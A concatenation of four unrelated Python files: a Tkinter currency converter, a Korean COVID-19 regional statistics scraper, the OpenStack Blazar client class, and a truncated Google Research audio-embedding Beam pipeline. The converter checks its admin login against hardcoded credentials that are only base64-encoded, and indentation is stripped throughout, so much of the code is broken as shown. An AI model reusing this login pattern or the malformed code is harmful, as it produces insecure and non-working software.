lastClickX = 0
lastClickY = 0
#-----main code -----
def SaveLastClickPos(event):
global lastClickX, lastClickY
lastClickX = event.x
lastClickY = event.y
def Dragging(event):
x, y = event.x - lastClickX + root.winfo_x(), event.y - lastClickY + root.winfo_y()
root.geometry("+%s+%s" % (x , y))
#___conversion class___
class RealTimeCurrencyConverter():
def convert(self,inp_curr,out_curr,input_amount):
self.inp_code,ext1= map(str,inp_curr.split('-'))
self.out_code,ext2= map(str,out_curr.split('-'))
response_url = "https://api.ratesapi.io/api/latest?base={}&symbols={}".format(self.inp_code, self.out_code)
response = requests.get(response_url)
data = response.json()
rates = data['rates'][self.out_code]
self.output_amount = rates*float(input_amount)
return self.output_amount
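# Using the converter on its own (a sketch; the request hits the live rates API, so
# the returned amount depends on current exchange rates):
#
#   converter = RealTimeCurrencyConverter()
#   inr = converter.convert('USD-United States dollar', 'INR-Indian rupee', 100)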
#____ App class____
class App(tk.Tk):
def __init__(self):
#creating main window attributes
title_bar = Frame(root,bd=5,highlightthickness=0,bg="#2e2e2e")
title_bar.pack(expand=0, fill=X)
close_button = Button(title_bar, text='X', command=root.destroy,bg="#2e2e2e",padx=2,pady=2,activebackground='red',bd=0,font="bold",fg='white',highlightthickness=3)
close_button.pack(side=RIGHT)
l = Label(title_bar,text="CURRENCY CONVERTER ",font=('algerian', 10, "bold"),fg="white",bg="#2e2e2e")
l.pack(side="left")
value_out = StringVar()
value_in = StringVar()
amount = StringVar()
Var_1 = Button(root,text = "Currency Converter",activebackground="light blue",activeforeground="red",bd=3,padx=30,command = self.main ) #,state=DISABLED
Var_2 = Button(root,text = "Graphical analysis",activebackground="pink",bd=3,padx=30,command = self.graph)
Var_3 = Button(root,text = "OTHERS",activebackground="light blue",bd=3,padx=60,command = self.links) #,bg = "white"
Var_4 = Button(root,text = "ADMIN Login",bd=3,padx=45, command = self.var )
Var_1.place(x = 0 ,y = 55)
Var_2.place(x = 180,y = 55)
Var_3.place(x = 350,y = 55)
Var_4.place(x = 530,y = 55)
title_bar.bind('<Button-1>', SaveLastClickPos)
title_bar.bind('<B1-Motion>', Dragging)
def var(self): #driver code window attributes
self.uname = StringVar()
self.passw = StringVar()
self.canv = Canvas(height= 500,width = 700, bg="light blue")
self.canv.place(x =0,y = 85)
header = Label(self.canv, text = "ADMIN LOGIN", font = ('algerian', 20), bg="light blue")
header.place(x = 200,y = 100)
uname_lab = Label(self.canv, text = "User Name:", bg="light blue")
uname_lab.place(x = 100,y = 150)
uname_entry = Entry(self.canv,textvariable =self.uname)
uname_entry.place(x = 200,y = 150)
pass_lab = Label(self.canv, text = "Password:", bg="light blue")
pass_lab.place(x = 100,y = 200)
pass_entry = Entry(self.canv,show="*",textvariable =self.passw)
pass_entry.place(x = 200,y = 200)
login = Button(self.canv,text = "LOGIN",height=2,padx = 7,activebackground="#2C84EF",command = self.login)
login.place(x = 200,y = 250)
def links(self):# others
canv1 = Canvas(height= 500,width = 700, bg="light blue")
canv1.place(x =0,y = 85)
B = Button(canv1, text= "Calculator",padx = 50,font = 30,command = self.calc).place(x = 100,y = 200)
B1 = Button(canv1, text= "Trending",padx = 50,font = 30,command = self.ext).place(x = 100,y = 100)
def calc(self): #calculator
calc.app()
def graph(self):# graphical analysis inputs
self.canvx = Canvas(height =500,width = 700, bg="light blue")
self.canvx.place(x=0,y=85)
self.inpcode = StringVar()
self.outcode = StringVar()
self.date = StringVar()
inpl = Label(self.canvx,text = "Input Currency Code:",bg = "light blue").place(x = 100,y = 100)
inpb = Entry(self.canvx,textvariable = self.inpcode ).place(x = 300,y = 100)
outb = Entry(self.canvx,textvariable = self.outcode ).place(x = 300,y = 150)
outl = Label(self.canvx,text = "Output Currency Code:",bg = "light blue").place(x = 100,y = 150)
plot = Button(self.canvx,height = 1, width = 10,text = "Plot",command = self.graph_core).place(x = 200,y =250)
x = ttk.Combobox(self.canvx, textvariable = self.date, state = 'readonly', font = ('arial', 10),width = 20)
x['values'] = (2021,2020,2019,2018,2017,2016,2015,2014,2013,2012,2011,2010,2009)
x.place(x = 300 , y = 200)
Label(self.canvx,text = "Choose Year:",bg= "light blue").place(x = 100,y = 200)
def graph_core(self):# graphical analysis using matplotlib
strinpcode = str(self.inpcode.get())
stroutcode = str(self.outcode.get())
strdate = str(self.date.get())
x,y = [],[]
z = ['6','12']
fyear = int(strdate)
tyear, tmonth , tday = map(int, str(date.today()).split("-"))
if abs(fyear-tyear) > 5:
for i in range(fyear,tyear+1):
response = requests.get("https://api.ratesapi.io/api/{}-06-01?base={}&symbols={}".format(i,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append(i)
elif abs(fyear-tyear) <=5 and abs(fyear-tyear)>1:
for i in range(fyear,tyear):
for j in 6,12:
response = requests.get("https://api.ratesapi.io/api/{}-{}-01?base={}&symbols={}".format(i,j,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append("{}/{}".format(i,j))
elif fyear == 2021:
for i in range(1,tmonth+1):
response = requests.get("https://api.ratesapi.io/api/2021-{}-01?base={}&symbols={}".format(i,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append("{}/{}".format(2021,i))
else :
for i in range(fyear,tyear):
for j in range(1,13):
response = requests.get("https://api.ratesapi.io/api/{}-{}-01?base={}&symbols={}".format(i,j,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append("{}/{}".format(i,j))
hell = Tk()
hell.attributes('-topmost', True)
        hell.title("{} vs {} comparison".format(strinpcode,stroutcode))
hell.geometry("500x500")
def ploti(x,y):
fig = Figure(figsize = (10, 10),dpi = 100)
plot1 = fig.add_subplot(111)
plot1.plot(x,y)
canvas = FigureCanvasTkAgg(fig, master = hell)
canvas.draw()
canvas.get_tk_widget().pack()
toolbar = NavigationToolbar2Tk(canvas,hell)
toolbar.update()
canvas.get_tk_widget().pack()
ploti(x,y)
hell.mainloop()
def main(self): # currency conversion
self.canv2 = Canvas(height= 500,width = 700, bg="light blue")
self.canv2.place(x =0,y = 85)
self.value_out = StringVar()
self.value_in = StringVar()
self.amount = StringVar()
inp = Label(self.canv2,text="INPUT CURRENCY",font = ('algerian', 15), bg="light blue")
inp.place(x = 75,y = 100)
out = Label(self.canv2,text="OUTPUT CURRENCY",font = ('algerian', 15), bg="light blue")
out.place(x = 400,y = 100)
Optionout = ttk.Combobox(self.canv2, textvariable = self.value_out, state = 'readonly', font = ('arial', 15), width = 20)
Optionout['values'] = ('GBP-Pound sterling','HKD-Hong Kong Dollar','IDR-Indonesian Rupiah','ILS-Israeli New Shekel','DKK-Danish Krone','INR-Indian rupee','CHF-Swiss Franc','MXN-Mexican peso','CZK-Czech koruna koruna česká','SGD-Singapore Dollar','THB-Thai baht','HRK-Croatian Kuna','EUR-Euro','MYR-Malaysian Ringgit','NOK-Norwegian Krone','CNY-Chinese yuan renminbi','BGN-Bulgarian Lev','PHP-Philippine peso','PLN-Polish zloty','ZAR-South African Rand','CAD-Canadian Dollar','ISK-Icelandic Króna','BRL-Brazilian real','RON-Romanian leu','NZD-New Zealand Dollar','TRY-Turkish lira','JPY-Japanese yen','RUB-Russian Ruble','KRW-South Korean won','USD-United States dollar','AUD-Australian Dollar','HUF-Hungarian Forint','SEK-Swedish Krona')
Optionout.place(x = 400 , y = 150)
Optionin = ttk.Combobox(self.canv2, textvariable = self.value_in, state = 'readonly', font = ('arial', 15), width = 20)
Optionin['values'] = ('GBP-Pound sterling','HKD-Hong Kong Dollar','IDR-Indonesian Rupiah','ILS-Israeli New Shekel','DKK-Danish Krone','INR-Indian rupee','CHF-Swiss Franc','MXN-Mexican peso','CZK-Czech koruna koruna česká','SGD-Singapore Dollar','THB-Thai baht','HRK-Croatian Kuna','EUR-Euro','MYR-Malaysian Ringgit','NOK-Norwegian Krone','CNY-Chinese yuan renminbi','BGN-Bulgarian Lev','PHP-Philippine peso','PLN-Polish zloty','ZAR-South African Rand','CAD-Canadian Dollar','ISK-Icelandic Króna','BRL-Brazilian real','RON-Romanian leu','NZD-New Zealand Dollar','TRY-Turkish lira','JPY-Japanese yen','RUB-Russian Ruble','KRW-South Korean won','USD-United States dollar','AUD-Australian Dollar','HUF-Hungarian Forint','SEK-Swedish Krona')
Optionin.place(x = 75 , y = 150)
in_field = Entry(self.canv2,bd = 1, justify =CENTER, width = 22,font =20, textvariable = self.amount)
in_field.place(x = 75 ,y = 200)
self.out_field = Label(self.canv2,bd = 1, justify =CENTER, width = 22,font =20,bg = "white") #add text output value
self.out_field.place(x = 400 ,y = 200)
convertb = Button(self.canv2,text = "CONVERT",height=2,padx = 7,activebackground="#2C84EF",command = self.convertbact)
convertb.place(x = 300, y =250)
history = Button(self.canv2,text = "RECENT", height=2,padx = 11,command = self.history)
history.place(x = 300, y =300)
caution_red = Label(self.canv2,text= "*Enter only numbers",font =('Baskerville Old Face',8),fg = "red", bg="light blue")
caution_red.place(x = 130 ,y = 230)
def convertbact(self):# storing history
inp_curr = self.value_in.get()
out_curr = self.value_out.get()
input_amount = self.amount.get()
RealTimeCurrencyConverter.convert(self,inp_curr,out_curr,input_amount)
self.out_field['text'] = self.output_amount
self.f = open('history.txt','a')
self.f.write("Input Currency Code: %s\nOutput Currency Code: %s\nInput Amount: %s\nOutput Amount: %s Time :%s\n\n" % (self.inp_code,self.out_code,float(input_amount),round(float(self.output_amount),5),datetime.now().strftime("%d/%m/%Y %H:%M:%S")))
self.f.close()
def history(self):# displaying recent conversions
self.canv3 = Canvas(height= 500,width = 700)
self.canv3.place(x =0,y = 85)
scrollbar = Scrollbar(self.canv3)
scrollbar.place(x= 750,y = 0)
mylist = Listbox(self.canv3 , yscrollcommand = scrollbar.set ,height = 20,width= 90)
f = open("history.txt",'r')
k = f.readlines()
for i in range(len(k)):
mylist.insert(END,k[i])
mylist.place(x = 30,y = 30)
scrollbar.config( command = mylist.yview )
header = Label(self.canv3,text = "YOUR RECENT TRANSACTIONS : ")
header.place(x=30,y=10)
Button(self.canv3,text = "CLEAR RECENT",command = self.clearh).place(x = 500,y = 360)
def clearh(self): # deleting stored history
f = open("history.txt",'w')
f.close()
def login(self): # admin login
        e_uname = self.uname.get().encode(encoding='UTF-8',errors='strict')
        e_passw = self.passw.get().encode(encoding='UTF-8',errors='strict')
        if base64.b64encode(e_uname) == b'U1VSWUE=' and base64.b64encode(e_passw) == b'UEFTU1dPUkQ=':
self.canv4 = Canvas(height= 500,width = 700)
self.canv4.place(x =0,y = 85)
            show = Label(self.canv4,bd = 1, justify =CENTER,font =20,text="YOU HAVE SUCCESSFULLY LOGGED IN!!!!")
show.place(x = 200 ,y = 200)
else:
show = Label(self.canv,bd = 1, justify =CENTER,font =('Baskerville Old Face',8),fg = "red",text="Incorrect Username Or password,Try Again", bg="light blue")
show.place(x = 120,y = 230)
def ext(self): # external resources
x = []
for i in ['USD','EUR','GBP']:
response_url = "https://api.ratesapi.io/api/latest?base={}&symbols={}".format('INR', i)
response = requests.get(response_url)
data = response.json()
rates = data['rates'][i]
x.append("100 Indian Rupees = {} {}".format(rates*100,i))
self.canvz = Canvas(height= 500,width = 700, bg="light blue")
self.canvz.place(x =0,y = 85)
Label(self.canvz,text= 'Current Trends', font = ("algerian",15),bg="light blue").place(x=50,y = 20)
l = str(date.today())
stri = 'As on '+l+' \n'
for i in x :
stri = stri + i +"\n"
Label(self.canvz,text = stri ,font = ("bradley hand itc",15,'bold')).place(x=50,y = 50)
import webbrowser
def openweb1():
webbrowser.open("https://github.com/Team007s/Currency-Converter",new=1)
def openweb2():
webbrowser.open('https://www.airasia.co.in/content/air-asia/en/home',new=1)
def openweb3():
webbrowser.open("https://www.air.irctc.co.in/",new=1)
def openweb4():
webbrowser.open("https://www.goindigo.in/",new=1)
Label(self.canvz,text = "Visit Some Trusted Travel Websites in India" ,font = ("bradley hand itc",15,'bold'),bg="light blue").place(x=50,y = 200)
Button(self.canvz,text = "Check For Updates\nCurrent Version 1.1",command=openweb1).place(x=550,y=360)
Button(self.canvz,text = "1.IRCTC Air",font = ("bradley hand itc",11,'bold'),width=20, command=openweb3).place(x=100,y=250)
Button(self.canvz,text = "2.Air Asia", font =("bradley hand itc",11,'bold'),width=20,command=openweb2).place(x=100,y=300)
Button(self.canvz,text = "3.IndiGo.",font =("bradley hand itc",11,'bold'),width=20,command=openweb4).place(x=100,y=350)
###_________driver code________
if __name__ == '__main__':
App()
root.mainloop()
|
import requests
from bs4 import BeautifulSoup
from utils import write_data
def get_data(url):
html = requests.get(url).text
soup = BeautifulSoup(html, 'html.parser')
    updated = soup.select('.timetable > .info > span')[0].text  # date of last update
data = soup.select('.rpsa_detail > div > div')
data.pop()
return data, updated
def parse_data(data, updated):
    confirmed_region = []  # confirmed cases by province/city
for i, d in enumerate(data):
        region = d.find_all('h4', class_='cityname')[0].text  # region name
temp = d.find_all('span', class_='num')
confirmed, _, recovered, deaths, confirmed_rate = [
element.text.replace(',', '') for element in temp]
        confirmed = int(confirmed)  # number of confirmed cases
        recovered = int(recovered)  # released from quarantine
        deaths = int(deaths)  # number of deaths
        confirmed_rate = float(confirmed_rate)  # incidence per 100,000 people
if i != 0:
slicing = d.find_all('p', class_='citytit')[0].text
            confirmed_region_rate = float(
                slicing[:slicing.find('%')])  # share of confirmed cases by region
else:
confirmed_region_rate = ''
confirmed_region.append({
'지역이름': region,
'확진자수': confirmed,
'격리해제수': recovered,
'사망자수': deaths,
'십만명당발생율': confirmed_rate,
'지역별확진자비율': confirmed_region_rate,
})
confirmed_region.append({'업데이트날짜': updated})
return confirmed_region
def run():
data, updated = get_data(
"http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=13&ncvContSeq=&contSeq=&board_id=&gubun=")
confirmed_region = parse_data(data, updated)
save_dir = './data/koreaRegionalData.js'
crawler_name = 'crawlKoreaRegionalData.py'
var_name = 'koreaRegionalData'
write_data(confirmed_region, save_dir, crawler_name, var_name)
print("#####################################")
print("############ 한국 지역별 데이터 #############")
print("######## koreaRegionalData.js #########")
run()
print("############### 완료!! ###############")
print("#####################################")
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from blazarclient.v1 import devices
from blazarclient.v1 import floatingips
from blazarclient.v1 import hosts
from blazarclient.v1 import leases
from blazarclient.v1 import networks
class Client(object):
"""Top level object to communicate with Blazar.
    Contains managers to control requests that should be passed to each type
    of resource: leases, events, etc.
**Examples**
client = Client()
client.lease.list()
client.event.list(<lease_id>)
...
"""
version = '1'
def __init__(self, blazar_url=None, auth_token=None, session=None,
**kwargs):
self.blazar_url = blazar_url
self.auth_token = auth_token
self.session = session
if not self.session:
logging.warning('Use a keystoneauth session object for the '
'authentication. The authentication with '
'blazar_url and auth_token is deprecated.')
self.lease = leases.LeaseClientManager(blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.host = hosts.ComputeHostClientManager(blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.floatingip = floatingips.FloatingIPClientManager(
blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.network = networks.NetworkClientManager(
blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.device = devices.DeviceClientManager(
blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
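# Example instantiation with a keystoneauth session, as the warning above recommends
# (a sketch; the auth URL and credentials are placeholders):
#
#   from keystoneauth1 import loading
#   from keystoneauth1 import session as ks_session
#   loader = loading.get_plugin_loader('password')
#   auth = loader.load_from_options(auth_url='http://keystone:5000/v3',
#                                   username='demo', password='secret',
#                                   project_name='demo', user_domain_id='default',
#                                   project_domain_id='default')
#   client = Client(session=ks_session.Session(auth=auth))
#   client.lease.list()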
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Construct a beam pipeline to map from audio to embeddings.
This file has two modes:
1) Map from tf.Examples of audio to tf.Examples of embeddings.
2) Map from a TFDS dataset to tf.Examples of embeddings.
It supports using a tf.hub module OR a TFLite model file to generate embeddings.
The TFLite file should have the `.tflite` extension.
"""
import copy
import numbers
import os
import random
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
from absl import flags
from absl import logging
import apache_beam as beam
import librosa
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_hub as hub
from non_semantic_speech_benchmark.export_model import tf_frontend
KEY_FIELD = 'key_adhoc'
FLAGS = flags.FLAGS
def _maybe_add_commas(list_obj, comma_escape_char):
return [x.replace(comma_escape_char, ',') for x in list_obj]
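# _maybe_add_commas restores commas that were escaped so they could survive absl's
# comma-separated list flags. A sketch, assuming '?' is the escape character:
#   _maybe_add_commas(['output?0', 'embedding'], '?') == ['output,0', 'embedding']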
def get_beam_params_from_flags(
):
"""Parses flags and returns arguments for beam job."""
# Get input data location from flags. If we're reading a TFDS dataset, get
# train, validation, and test.
input_filenames_list, output_filenames, sample_rate = read_input_glob_and_sample_rate_from_flags(
FLAGS.input_glob, FLAGS.sample_rate, FLAGS.tfds_dataset,
FLAGS.output_filename, FLAGS.tfds_data_dir)
# Sometimes we want commas to appear in `embedding_modules`,
# `embedding_names`, or `module_output_key`. However, commas get split out in
# Google's Python `DEFINE_list`. We compromise by introducing a special
# character, which we replace with commas here.
embedding_modules = _maybe_add_commas(FLAGS.embedding_modules,
FLAGS.comma_escape_char)
embedding_names = _maybe_add_commas(FLAGS.embedding_names,
FLAGS.comma_escape_char)
module_output_keys = _maybe_add_commas(FLAGS.module_output_keys,
FLAGS.comma_escape_char)
input_format = 'tfrecord'
output_format = 'tfrecord'
# All modules should be tflite or not tflite.
tflite = [x.endswith('.tflite') for x in embedding_modules]
if not np.all(tflite) and np.any(tflite):
raise ValueError(
f'Modules must all be tflite, or none: {embedding_modules}')
is_tflite = np.any(tflite)
logging.info('is_tflite: %s', is_tflite)
# pylint:disable=line-too-long
beam_params = dict(
sample_rate=sample_rate,
debug=FLAGS.debug,
embedding_names=embedding_names,
embedding_modules=embedding_modules,
module_output_keys=module_output_keys,
audio_key=FLAGS.audio_key,
sample_rate_key=FLAGS.sample_rate_key,
label_key=FLAGS.label_key,
speaker_id_key=FLAGS.speaker_id_key,
average_over_time=FLAGS.average_over_time,
delete_audio_from_output=FLAGS.delete_audio_from_output,
split_embeddings_into_separate_tables=FLAGS.split_embeddings_into_separate_tables,
use_frontend_fn=FLAGS.use_frontend_fn,
normalize_to_pm_one=FLAGS.normalize_to_pm_one,
model_input_min_length=FLAGS.model_input_min_length,
input_format=input_format,
output_format=output_format,
module_call_fn=(samples_to_embedding_tflite if is_tflite
else samples_to_embedding_tfhub),
setup_fn=build_tflite_interpreter if is_tflite else hub.load,
)
# pylint:enable=line-too-long
logging.info('input_filenames_list: %s', input_filenames_list)
logging.info('output_filenames: %s', output_filenames)
return input_filenames_list, output_filenames, beam_params
# Some inference functions, such as for `TFHub` and `TFLite` formats.
def samples_to_embedding_tfhub(
model_input,
sample_rate,
mod, # pylint:disable=g-bare-generic
output_key,
name):
"""Run inference to map a single audio sample to an embedding."""
logging.info('[%s] Module input shape: %s', name, model_input.shape)
# Some modules have signatures. If they do, they should only have one valid
# signature, and we should use that one. Otherwise, raise an error.
if callable(mod):
logging.info('[%s] is callable.', name)
sig = None
else:
logging.info('[%s] has signatures.', name)
if not hasattr(mod, 'signatures'):
raise ValueError(f'[{name}] Not callable and no signatures.')
if not mod.signatures:
raise ValueError(f'[{name}] Expected signatures, but they were empty.')
all_sigs = [s for s in mod.signatures if not s.startswith('_')]
valid_sigs = [s for s in all_sigs if not s.startswith('_')]
if len(valid_sigs) != 1:
raise ValueError(
f'[{name}] Didn\'t find exactly one valid signature: {all_sigs}')
sig = valid_sigs[0]
logging.info('[%s] Using signatures, and found: %s', name, sig)
# Models either take 2 args (input, sample_rate) or 1 arg (input).
# The first argument is either 1 dimensional (samples) or 2 dimensional
# (batch, samples).
# Try all. Order here matters. We must try "2 args" before "1 arg", otherwise
# models that use sample rate might ignore it.
errors = [] # Track errors. Display if none of them work.
tf_out = None
for num_args, add_batch_dim in [(2, False), (1, False), (2, True), (1, True)]:
cur_model_input = (tf.expand_dims(model_input, 0) if add_batch_dim
else model_input)
func_args = ((cur_model_input,) if num_args == 1 else
(cur_model_input, sample_rate))
try:
if sig:
tf_out = mod.signatures[sig](*func_args)
else:
tf_out = mod(*func_args)
except (ValueError, TypeError,
tf.errors.InvalidArgumentError) as e:
# Track errors and print them only if none of the expected signatures
# work.
errors.append(e)
continue
logging.info('[%s] Succeeded with num args %i, add_batch_dim %s', name,
num_args, add_batch_dim)
break
if tf_out is None:
raise ValueError(f'[{name}] None of the signatures worked: {errors}')
if isinstance(tf_out, dict):
if output_key not in tf_out:
raise ValueError(
f'[{name}] Key not recognized: "{output_key}" vs {tf_out.keys()}')
ret = tf_out[output_key]
else:
ret = tf_out
ret = np.array(ret)
if ret.ndim > 2:
# Batch-flatten in numpy.
ret = np.reshape(ret, [ret.shape[0], -1])
return ret
def samples_to_embedding_tflite(model_input, sample_rate,
interpreter,
output_key, name):
"""Run TFLite inference to map audio samples to an embedding."""
if model_input.ndim == 1:
model_input = np.expand_dims(model_input, axis=0)
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
# Resize TFLite input size based on length of sample.
# Ideally, we should explore if we can use fixed-size input here, and
# tile the sample to meet TFLite input size.
if not np.array_equal(model_input.shape, input_details[0]['shape']):
logging.info('[%s] TFLite input, actual vs expected: %s vs %s', name,
model_input.shape, input_details[0]['shape'])
interpreter.resize_tensor_input(input_details[0]['index'], model_input.shape)
interpreter.allocate_tensors()
interpreter.set_tensor(input_details[0]['index'], model_input)
# Models either take 2 args (input, sample_rate) or 1 arg (input). Try both.
if len(input_details) > 1:
interpreter.set_tensor(input_details[1]['index'],
np.array(sample_rate).astype(np.int32))
interpreter.invoke()
embedding_2d = interpreter.get_tensor(
output_details[int(output_key)]['index'])
return np.array(embedding_2d, dtype=np.float32)
# Setup functions. `TFLite` requires special code, but `TFHub` is trivial.
def build_tflite_interpreter(tflite_model_path):
model_content = None
with tf.io.gfile.GFile(tflite_model_path, 'rb') as model_file:
model_content = model_file.read()
interpreter = tf.lite.Interpreter(model_content=model_content)
interpreter.allocate_tensors()
return interpreter
def tfexample_audio_to_npfloat32(ex, audio_key,
normalize_to_pm_one):
"""Extract audio from tf.Example and convert it to np.float32."""
audio_feats = ex.features.feature[audio_key]
iinfo = np.iinfo(np.int16)
if audio_feats.int64_list.value:
audio = np.array(audio_feats.int64_list.value)
# Even though the data is in an int64 container, the data is actually int16.
if np.logical_or(audio < iinfo.min, audio > iinfo.max).any():
raise ValueError(
f'Audio doesn\'t conform to int16: {np.min(audio)}, {np.max(audio)}')
audio = audio.astype(np.float32)
if normalize_to_pm_one:
audio /= iinfo.max
else:
assert audio_feats.float_list.value
audio = np.array(audio_feats.float_list.value, dtype=np.float32)
if not normalize_to_pm_one:
audio *= iinfo.max
return audio
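# A tf.Example compatible with the reader above can be built like this (a sketch; the
# 'audio' key and the int16 sample values are assumptions):
#
#   ex = tf.train.Example()
#   samples_int16 = np.array([0, 512, -512], dtype=np.int16)
#   ex.features.feature['audio'].int64_list.value.extend(samples_int16.tolist())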
def _default_feature_fn(samples, sample_rate):
frontend_args = tf_frontend.frontend_args_from_flags()
feats = tf_frontend.compute_frontend_features(
samples, sample_rate, **frontend_args)
logging.info('Feats shape: %s', feats.shape)
return tf.expand_dims(feats, axis=-1).numpy().astype(np.float32)
@beam.typehints.with_input_types(Tuple[str, tf.train.Example])
@beam.typehints.with_output_types(Tuple[str, np.ndarray])
class ComputeEmbeddingMapFn(beam.DoFn):
"""Computes an embedding (key, tf.Example) from audio (key, tf.Example)."""
def __init__(
self,
name,
module,
output_key,
audio_key,
sample_rate_key,
sample_rate,
average_over_time,
feature_fn = None,
normalize_to_pm_one = True,
model_input_min_length = None,
target_sample_rate = 16000,
module_call_fn = samples_to_embedding_tfhub,
setup_fn = hub.load):
self._name = name
# If TFLite should be used, `module` should point to a flatbuffer model.
self._module = module
# For TFLite, `output_key` is the index of the embedding output from TFLite
# model (Usually 0).
self._output_key = output_key
self._audio_key = audio_key
self._sample_rate_key = sample_rate_key
self._sample_rate = sample_rate
self._average_over_time = average_over_time
self._feature_fn = feature_fn
self._normalize_to_pm_one = normalize_to_pm_one
self._model_input_min_length = model_input_min_length
self._target_sample_rate = target_sample_rate
self._module_call_fn = module_call_fn
self._setup_fn = setup_fn
# Only one of `sample_rate_key` and `sample_rate` should be not None.
if not (self._sample_rate_key is None) ^ (self._sample_rate is None):
raise ValueError('Must have exactly one sample_rate_key or sample_rate: '
f'{self._sample_rate_key} vs {self._sample_rate}')
def setup(self):
self.post_setup_module = self._setup_fn(self._module)
def read_audio_from_tfexample(self,
ex,
k,
normalize_to_pm_one = True):
"""Reads the audio samples from a tf.Example, and assert input sanity."""
if self._audio_key not in ex.features.feature:
raise ValueError(f'Audio key `{self._audio_key}` not found: '
f'{list(ex.features.feature.keys())}')
audio = tfexample_audio_to_npfloat32(ex, self._audio_key,
normalize_to_pm_one)
assert audio.ndim == 1, audio.ndim
if audio.size == 0:
raise ValueError(f'No audio found: {self._audio_key}, {audio.size} {k}')
beam.metrics.Metrics.distribution(
'computed-embedding-audio', 'length').update(audio.size)
return audio
def read_sample_rate_from_tfexample(self, ex):
"""Reads the sample rate from a tf.Example."""
if self._sample_rate_key:
if self._sample_rate_key not in ex.features.feature:
raise ValueError(f'Sample rate key not found: {self._sample_rate_key}')
sr_feat = ex.features.feature[self._sample_rate_key]
# Use `sample_rate` in `float_list` or `int64_list`. Either way, convert
# to an integer for downstream use.
if not len(sr_feat.float_list.value) ^ len(sr_feat.int64_list.value):
raise ValueError(
f'Expected exactly one of `float_list` and `int64_list`: {sr_feat}')
if sr_feat.float_list.value:
sample_rate = int(sr_feat.float_list.value[0])
else:
sample_rate = sr_feat.int64_list.value[0]
else:
if not self._sample_rate:
raise ValueError('If `sample_rate_key` not provided, must provide '
'`sample_rate`.')
sample_rate = self._sample_rate
return sample_rate
def resample(self, audio, sample_rate,
target_sr):
"""Resample audio to target."""
return librosa.core.resample(
audio, orig_sr=sample_rate, target_sr=target_sr, res_type='kaiser_best')
def audio_to_features(self, audio,
sample_rate):
"""Convert audio to features, if required."""
if self._feature_fn:
model_input = self._feature_fn(audio, sample_rate)
if not isinstance(model_input, np.ndarray):
raise ValueError(f'Expected ndarray, got {type(model_input)}')
if model_input.dtype != np.float32:
raise ValueError(f'Should be float32, was: {model_input.dtype}')
else:
model_input = audio
if self._model_input_min_length and model_input.size < self._model_input_min_length:
delta = self._model_input_min_length - model_input.size
model_input = np.pad(model_input, [0, delta], mode='symmetric')
logging.info('`model_input` shape is: %s', model_input.shape)
return model_input
def process(
self, k_v):
k, ex = k_v
# Read the input example audio and assert input format sanity.
audio = self.read_audio_from_tfexample(
ex, k, normalize_to_pm_one=self._normalize_to_pm_one)
# Read the sample rate, if a key to do so has been provided.
sample_rate = self.read_sample_rate_from_tfexample(ex)
logging.info('len(audio): %s / %s / %s', len(audio), sample_rate,
self._name)
# Resample, if necessary.
if sample_rate != self._target_sample_rate:
audio = self.resample(
audio, sample_rate, target_sr=self._target_sample_rate)
sample_rate = self._target_sample_rate
# Convert audio to features, if required.
model_input = self.audio_to_features(audio, sample_rate)
# Calculate the 2D embedding.
embedding_2d = self._module_call_fn(
model_input, sample_rate, self.post_setup_module, self._output_key,
self._name)
if not isinstance(embedding_2d, np.ndarray):
raise ValueError(f'`embedding_2d` wrong type: {type(embedding_2d)}')
if embedding_2d.ndim != 2:
raise ValueError(f'`embedding_2d` wrong dims: {embedding_2d.ndim}')
if embedding_2d.dtype != np.float32:
raise ValueError(f'`embedding_2d` wrong type: {embedding_2d.dtype}')
logging.info('[%s] `embedding_2d` shape: %s', self._name,
embedding_2d.shape)
beam.metrics.Metrics.counter('computed-embedding', self._name).inc()
beam.metrics.Metrics.distribution(f'computed-embedding-{self._name}',
'length').update(embedding_2d.shape[0])
# Average over time, if required.
if self._average_over_time:
embedding = np.mean(embedding_2d, axis=0, keepdims=True)
else:
embedding = embedding_2d
yield (k, embedding)
def _add_embedding_to_tfexample(ex, embedding,
name):
"""Add a 2D embedding to a tf.train.Example."""
# Store the embedding 2D shape and store the 1D embedding. The original
# embedding can be recovered with `emb.reshape(feature['shape'])`.
f = ex.features.feature[f'{name}/shape']
f.int64_list.value.extend(embedding.shape)
f = ex.features.feature[name]
f.float_list.value.extend(embedding.reshape([-1]))
return ex
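# Reading a stored embedding back from a serialized example (a sketch; 'trill' is a
# hypothetical embedding name, which the pipeline below stores under 'embedding/trill'):
#
#   ex = tf.train.Example.FromString(serialized_bytes)
#   shape = ex.features.feature['embedding/trill/shape'].int64_list.value
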